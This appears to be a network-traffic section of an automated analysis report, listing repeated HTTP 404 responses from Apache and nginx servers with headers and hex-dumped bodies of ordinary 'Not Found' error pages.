74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 09:53:06 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13840X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 09:53:09 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13840X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 09:53:28 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 63 71 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /acqm/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 09:53:31 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 63 71 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /acqm/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 09:53:34 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 63 71 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /acqm/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 09:53:37 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 63 71 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /acqm/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:53:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:53:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:54:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
